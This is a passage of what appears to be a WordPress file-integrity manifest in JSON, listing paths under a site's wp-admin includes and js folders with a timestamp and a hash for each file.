\"ed872aae05bc79fde6c864edadf77c81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/dashboard.php\":{\"d\":1540792764,\"h\":\"6a709a48ee04f3198901c1938a878fd3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/bookmark.php\":{\"d\":1520545542,\"h\":\"58075a0405beca8a6c146de3b6d74105\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-ms-users-list-table.php\":{\"d\":1520529520,\"h\":\"ee63792e0db3cb53ca210757f0ce16d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-bulk-theme-upgrader-skin.php\":{\"d\":1501107044,\"h\":\"0f138ac4c54c7451647a0e954c41cbe1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/continents-cities.php\":{\"d\":1531904244,\"h\":\"577c11036c4d6e570c465937d9b27b65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/comment.php\":{\"d\":1467204390,\"h\":\"d097ee8cf112a84ffa3e9995a3f90d58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/update-core.php\":{\"d\":1547081516,\"h\":\"178d34fc4e431862fe48f1973866a790\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-ms-sites-list-table.php\":{\"d\":1503393768,\"h\":\"59817f859d1c91f3deb516726bee4843\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-bulk-plugin-upgrader-skin.php\":{\"d\":1501107044,\"h\":\"34a29dbcc83894f6faacb501d3dfa70b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-plugin-upgrader-skin.php\":{\"d\":1503401564,\"h\":\"1fe496c7ca467a92b114b6a116497c23\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/ms.php\":{\"d\":1503393768,\"h\":\"081bede273682de656f71133d6557604\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/ms-admin-filters.php\":{\"d\":1506512866,\"h\":\"063002d3c1f33939fa8aea47d41cdb82\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/post.php\":{\"d\":1545267191,\"h\":\"fb783cc47733b63ade9b9d991426a07e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-plugin-installer-skin.php\":{\"d\":1506253974,\"h\":\"d10a3359b11d84106318447fdae3f0b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/noop.php\":{\"d\":1485376844,\"h\":\"9930bd7810469e612350ae7c44338cef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-theme-installer-skin.php\":{\"d\":1507556088,\"h\":\"ed67b54294134913aeae71ad884b277d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-filesystem-ssh2.php\":{\"d\":1501107044,\"h\":\"34f24454a4e9892efb483e64407d7c83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/screen.php\":{\"d\":1467900570,\"h\":\"8e197a008123886c7f810f3b8021fa0c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-filesystem-base.php\":{\"d\":1501107044,\"h\":\"6c758f9a0f5df050890ac7c44cec5de8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/network.php\":{\"d\":1508350908,\"h\":\"36f6e8cd99fdcd05a44e6def4338d2b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-walker-nav-menu-checklist.php\":{\"d\":1506973486,\"h\":\"a8b29c21eca6b33e834f39b2e42e0ca5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/user.php\":{\"d\":1531834706,\"h\":\"7a110d494de409e88b186442416d01ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-upgrader-skin.php\":{\"d\":1501107044,\"h\":\"71a5eda8ff425da05eae65826cb51071\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-ftp.php\":{\"d\":1541000754,\"h\":\"f667f846e65ddd1770c33644014634a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/meta-boxes.php\":{\"d\":1541984930,\"h\":\"b69ebffa253f5726ba86ce6290376895\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/template.php\":{\"d\":1543291788,\"h\":\"33389972d5a1ae2cecadb1c36d1793b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/upgrade.php\":{\"d\":1543600546,\"h\":\"bc6977a8189cd5289398cdb4a2cf9e72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/translation-install.php\":{\"d\":1503393768,\"h\":\"6c497efaf9b41cd8c709de9d226ac4d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/nav-menu.php\":{\"d\":1508835204,\"h\":\"5727dea6cb4cb88348bed0494f330f41\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-filesystem-direct.php\":{\"d\":1501107044,\"h\":\"9db1a11b089126d41c947087fd951039\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-core-upgrader.php\":{\"d\":1508337948,\"h\":\"8c961c13800e2276ddd9651a8b887341\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-filesystem-ftpsockets.php\":{\"d\":1501107044,\"h\":\"08a453e5c9aba918027ed061e6c22180\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/export.php\":{\"d\":1498516122,\"h\":\"d44b95acd17163192a2e0a8d05c63de1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/update.php\":{\"d\":1503393768,\"h\":\"654b42f477137080d4f0bb19dfbb13f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-users-list-table.php\":{\"d\":1520529520,\"h\":\"689c0e57573ed5c6dfdf80e1aa1b6fac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-upgrader.php\":{\"d\":1511228802,\"h\":\"2bbeaeee65260ca088a9da8f9c6b139b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/theme.php\":{\"d\":1520529160,\"h\":\"60a6147fc07c42f0493b84425ba8a9ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-theme-install-list-table.php\":{\"d\":1543600546,\"h\":\"f2f53e94ee19b73394da187f22f0f3ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-post-comments-list-table.php\":{\"d\":1445085806,\"h\":\"5c34f85a05eee305eac2654e5d25e544\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-comments-list-table.php\":{\"d\":1506964488,\"h\":\"15f4fcabf67d308c73a875582f7408ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/image-edit.php\":{\"d\":1503391364,\"h\":\"3ecb93991d433418070540d05a77b619\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-plugin-upgrader.php\":{\"d\":1508337948,\"h\":\"1e51c811e6fa2c3e3af0ec51104bf689\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-upgrader-skins.php\":{\"d\":1480727442,\"h\":\"eb3f151fc0a8485ae1cb1e8cb9eb7655\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/taxonomy.php\":{\"d\":1464229228,\"h\":\"362f31b73f462cedc8aaff1fd730db5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-screen.php\":{\"d\":1544673263,\"h\":\"37815af2505b347d467f469290d6eb45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/image.php\":{\"d\":1539827126,\"h\":\"5a5a25e48f43679b4e864a96f5bbb71e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-file-upload-upgrader.php\":{\"d\":1503393768,\"h\":\"24d5f9d3018126665ad26d2dd65fe2d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-community-events.php\":{\"d\":1530144270,\"h\":\"dc61e942ee6cbf59dc9220aee8694e1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-list-table.php\":{\"d\":1501107044,\"h\":\"3daaf316d454a8a4a51f81da8097654a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-theme-upgrader.php\":{\"d\":1508338248,\"h\":\"8287b268a13f14893a06c1d4a1dadb1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-internal-pointers.php\":{\"d\":1526304206,\"h\":\"d919d925b44e0231308fa2ee5b164ed9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-plugins-list-table.php\":{\"d\":1507151626,\"h\":\"1f8fdcaa8955587f40ea42e57e06ca97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-automatic-upgrader-skin.php\":{\"d\":1501107044,\"h\":\"ea740f14b1d05d9314ec1a632e2a32e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-ftp-pure.php\":{\"d\":1472228250,\"h\":\"42e4621745bde04512803e8702db1152\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/media.php\":{\"d\":1516037560,\"h\":\"fb7b88f87cc0eafc7424dac8fd5b1229\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-links-list-table.php\":{\"d\":1501107044,\"h\":\"ee005fa711bb04dd6290cb38797e9887\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-walker-category-checklist.php\":{\"d\":1506973486,\"h\":\"abb685b7b2b740c9edd5ff1c40b4312e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/menu.php\":{\"d\":1467204390,\"h\":\"a16c328791716cce6d032b933f4c9376\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/schema.php\":{\"d\":1532443106,\"h\":\"00702f602b84e377c7aa23d9fd4b2944\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/import.php\":{\"d\":1506490250,\"h\":\"d6226ea49deea475624d45374fde2bc9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-video-widget.min.js\":{\"d\":1539135686,\"h\":\"b86c749b784acc5a8481b0888619234c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-widgets.js\":{\"d\":1508425974,\"h\":\"42607f91d7bb0160a1f7635b2b36c67c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-video-widget.js\":{\"d\":1508362674,\"h\":\"133a39bd8c47630947212e04dc47672a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/custom-html-widgets.js\":{\"d\":1516051298,\"h\":\"58dbb81230e96444f2de93603322dbac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-gallery-widget.js\":{\"d\":1508447688,\"h\":\"437aac35ea3d3a698505ce9aa7a4c090\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-widgets.min.js\":{\"d\":1539135686,\"h\":\"e8e8c2726be86a0e5959689f83e68b4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/custom-html-widgets.min.js\":{\"d\":1539135686,\"h\":\"91ded92347b6cc64e9724408d9defa09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-gallery-widget.min.js\":{\"d\":1539135686,\"h\":\"3fbbc0b9f61ddca152fa3847aba20581\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-audio-widget.js\":{\"d\":1495481742,\"h\":\"9afcfed7095623b2c6a90ffb3ed2489f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/text-widgets.js\":{\"d\":1504955984,\"h\":\"62f4cd853c19bd9b7e2836395d2ffcf6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-image-widget.js\":{\"d\":1506311926,\"h\":\"8fac7176be3db30dfc5d0c59514ac1f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-audio-widget.min.js\":{\"d\":1539135686,\"h\":\"ca37de8a34e673469901c4113e99d693\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/media-image-widget.min.js\":{\"d\":1539135686,\"h\":\"b02a9bf568ddbf039eb477f8db40783c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets\\/text-widgets.min.js\":{\"d\":1539135686,\"h\":\"32b7abeff170db2b017381efe0b78fad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/media-upload.js\":{\"d\":1452692848,\"h\":\"94b464e9b4ec6b545486af795f24016d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/wp-fullscreen-stub.min.js\":{\"d\":1539135686,\"h\":\"700a94e9934c7b419dfa6790b1dc4a35\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/edit-comments.min.js\":{\"d\":1539135686,\"h\":\"0405cc7848d59145b6953e7fd9b1c419\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/updates.min.js\":{\"d\":1539135686,\"h\":\"2d5652fcb04e5210b9bb86317b023902\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/post.js\":{\"d\":1525890628,\"h\":\"c80252996072ccb0aa20eb24bfc388e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/word-count.min.js\":{\"d\":1539135686,\"h\":\"997f505fc9d24a27e4939641450e96a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/gallery.min.js\":{\"d\":1539135686,\"h\":\"4e7b25e9bc3374cf391d5a652651a277\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/customize-nav-menus.min.js\":{\"d\":1539135686,\"h\":\"b6bd555ecefea0378f027c9441a243e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/inline-edit-tax.min.js\":{\"d\":1539135686,\"h\":\"276a51688f82154e668da8ccc2664360\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/common.js\":{\"d\":1508878668,\"h\":\"6c175816ac122145e3d941fd3607bacb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/theme-plugin-editor.js\":{\"d\":1508167792,\"h\":\"520d3d51ba9b168fd8ebdec6fe62355c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/dashboard.js\":{\"d\":1540283680,\"h\":\"9271890ed60cd3e49b8a561767999e4c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/user-suggest.js\":{\"d\":1390855212,\"h\":\"1e33290807fa8b2829ddb0347d0a9305\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/custom-header.js\":{\"d\":1384398612,\"h\":\"32b3005887a4cb606fecc09c756605bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/color-picker.min.js\":{\"d\":1539135686,\"h\":\"ca1331e8606d08cddd3db4a1c50a0625\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/plugin-install.js\":{\"d\":1516127324,\"h\":\"111082709bd5b31ec3f6230dcbc2c453\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/media-upload.min.js\":{\"d\":1539135686,\"h\":\"f320174ed63de275264dcf5430c309dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/plugin-install.min.js\":{\"d\":1539135686,\"h\":\"c10e07ae10cf119ed6c90ab69428e48d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/svg-painter.min.js\":{\"d\":1539135686,\"h\":\"a79aca561a5b87b62a710b0526a8e4bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/editor-expand.min.js\":{\"d\":1539135686,\"h\":\"4500034a26d73b737f761adcc7ef5c79\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/postbox.min.js\":{\"d\":1539135686,\"h\":\"ddfe27f4efae737b800bad96ed8a0969\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/customize-widgets.js\":{\"d\":1507920716,\"h\":\"e92d16056260b9b00ff62ba8cf8ac956\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/xfn.min.js\":{\"d\":1539135686,\"h\":\"1b6f6842124166a08328aa7ad376027e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/theme.min.js\":{\"d\":1539135686,\"h\":\"88f98b449b8aa12942cafd783b5aa7b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/revisions.min.js\":{\"d\":1539135686,\"h\":\"0886448d087ccc0cb432130320821f69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/customize-nav-menus.js\":{\"d\":1541987628,\"h\":\"761a86bbff4239fc775162efb53fb2fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/editor.min.js\":{\"d\":1539135686,\"h\":\"72b7a034ba598088d699dca7b02b6f0b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/tags-box.min.js\":{\"d\":1539135686,\"h\":\"01b149cd42ae563cc462f7e81384da3d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/custom-background.min.js\":{\"d\":1539135686,\"h\":\"351f2eef1d5033d68e8982ea86167e3f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/inline-edit-post.js\":{\"d\":1506972172,\"h\":\"9d57cc3de14e3597d49407ba21650a17\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/updates.js\":{\"d\":1531887146,\"h\":\"06a4eaec20bc68b7f434a5e66af39ba6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/postbox.js\":{\"d\":1474561052,\"h\":\"e3dfc3b71fefc8c6eb82df54e3460b53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/user-suggest.min.js\":{\"d\":1539135686,\"h\":\"e089545cd7fcde5c7cd70de3a70139e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/svg-painter.js\":{\"d\":1386271870,\"h\":\"87dcfbe97f902fa77cc4a9889c827afc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/nav-menu.min.js\":{\"d\":1539135686,\"h\":\"5169d979fee3b7679953b2b7f434910d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/customize-controls.js\":{\"d\":1525804048,\"h\":\"8dad23d14838a3e8600eff1bee809b2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/color-picker.js\":{\"d\":1504445566,\"h\":\"adfc5e0653304dd92664a01ce7083649\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/editor-expand.js\":{\"d\":1503587926,\"h\":\"88a83136db40e8e8b93f230a6712ea54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/theme-plugin-editor.min.js\":{\"d\":1539135686,\"h\":\"ebd5a282a3cbe917233b9355f85e02e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/code-editor.js\":{\"d\":1508853954,\"h\":\"4368208ec74f238fc80ef7dc47b2aba6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/inline-edit-tax.js\":{\"d\":1506972172,\"h\":\"75694df32dda3134f2ae3395701421f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/common.min.js\":{\"d\":1539135686,\"h\":\"febc435f5a360e41a7b2b6cb2368af70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/edit-comments.js\":{\"d\":1506972172,\"h\":\"a975fc736cdecddbfb9aed80699fb3af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/user-profile.js\":{\"d\":1506020388,\"h\":\"7e8a197f4aec099d481cc4b4dfcc0a21\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/custom-background.js\":{\"d\":1497524082,\"h\":\"3e22f2941127d8ca57718fa7de91568b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/image-edit.js\":{\"d\":1521914202,\"h\":\"b6c28ba4d4b1419cb5cf936cc277f0f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/accordion.min.js\":{\"d\":1539135686,\"h\":\"226bc149fc7a1d2d56e4530d3b685e58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/media-gallery.js\":{\"d\":1471724970,\"h\":\"d0809048874d234e35abae65dc17710a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets.min.js\":{\"d\":1539135686,\"h\":\"de756f5669035c3590ed9d4da7773a72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/post.min.js\":{\"d\":1539135686,\"h\":\"ede5f7e8431dbeb790e8cf9665192171\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/comment.min.js\":{\"d\":1539135686,\"h\":\"8f3603ed0d77c4a1ae8f82dbd3159ed9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/nav-menu.js\":{\"d\":1501789364,\"h\":\"4ebe903cffb8b10b75569a121e899b53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/link.js\":{\"d\":1384483570,\"h\":\"1c8675dcd035cfb374f67bfcbf117a8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/customize-widgets.min.js\":{\"d\":1539135686,\"h\":\"2724ee570a2716c8a7ad0436cb541e7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/comment.js\":{\"d\":1497522760,\"h\":\"48e97502ef33e12eb022ad86d6d0bbb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/password-strength-meter.min.js\":{\"d\":1539135686,\"h\":\"1aaa74a24aef982b82498717c1d1e6d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/theme.js\":{\"d\":1511483202,\"h\":\"7f52d864cd927714515906c74582e21b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/word-count.js\":{\"d\":1483731760,\"h\":\"5c34b03b6ec23142fc52a77a51dbd00a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/wp-fullscreen-stub.js\":{\"d\":1463155892,\"h\":\"968528cb325471eb001fd8578a8625e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/tags-suggest.js\":{\"d\":1490969146,\"h\":\"e6b0ed85e26e70669c5715c7ad0f093e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/media.js\":{\"d\":1497532074,\"h\":\"d9bf61cf4192c0a437323ef3bd70132d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/media-gallery.min.js\":{\"d\":1539135686,\"h\":\"3296d1fa20d292b002bba10490f1ba6e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/widgets.js\":{\"d\":1516143702,\"h\":\"e1b8555dd35d833a4233467e448a83fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/tags-box.js\":{\"d\":1508835650,\"h\":\"63756530c3d8b22327dcc0f15e71b8f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/accordion.js\":{\"d\":1438204226,\"h\":\"ef3fe33d4ce12fe5254e5af1025ce70a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/link.min.js\":{\"d\":1539135686,\"h\":\"f9ff4694933001933bdec2c133b2252d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/xfn.js\":{\"d\":1525959266,\"h\":\"8de5f12403af4eb425b9ae18dad17266\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/inline-edit-post.min.js\":{\"d\":1539135686,\"h\":\"f1d32f222e77a360ff3c62d3a6ee223b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/gallery.js\":{\"d\":1444345048,\"h\":\"78cfa96506bf3965c18afa6de5b5abb6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/image-edit.min.js\":{\"d\":1539135686,\"h\":\"8aefd8355be19a71bd7229f9ffb3517f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/code-editor.min.js\":{\"d\":1539135686,\"h\":\"3a55d10a30b356e96dd77cd870171558\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/revisions.js\":{\"d\":1487359842,\"h\":\"8d1b4d8308f2fc136df5dd875ee5529f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/tags.js\":{\"d\":1503588164,\"h\":\"92121be15064830078f19c7f912bc5f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/tags-suggest.min.js\":{\"d\":1539135686,\"h\":\"b0e2e58bbcb8654f8f6c09726c8df7e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/password-strength-meter.js\":{\"d\":1467368130,\"h\":\"2847576ec45293ab96dc0030974e2629\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/dashboard.min.js\":{\"d\":1540283680,\"h\":\"cdc52185bc346b9a55af6d5015d763cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/farbtastic.js\":{\"d\":1289484262,\"h\":\"a73af354a03241715d8698feea340b92\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/customize-controls.min.js\":{\"d\":1539135686,\"h\":\"834739e5c30c856f39db861e3427285b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/editor.js\":{\"d\":1516720722,\"h\":\"e086a26a0c57fde0e82d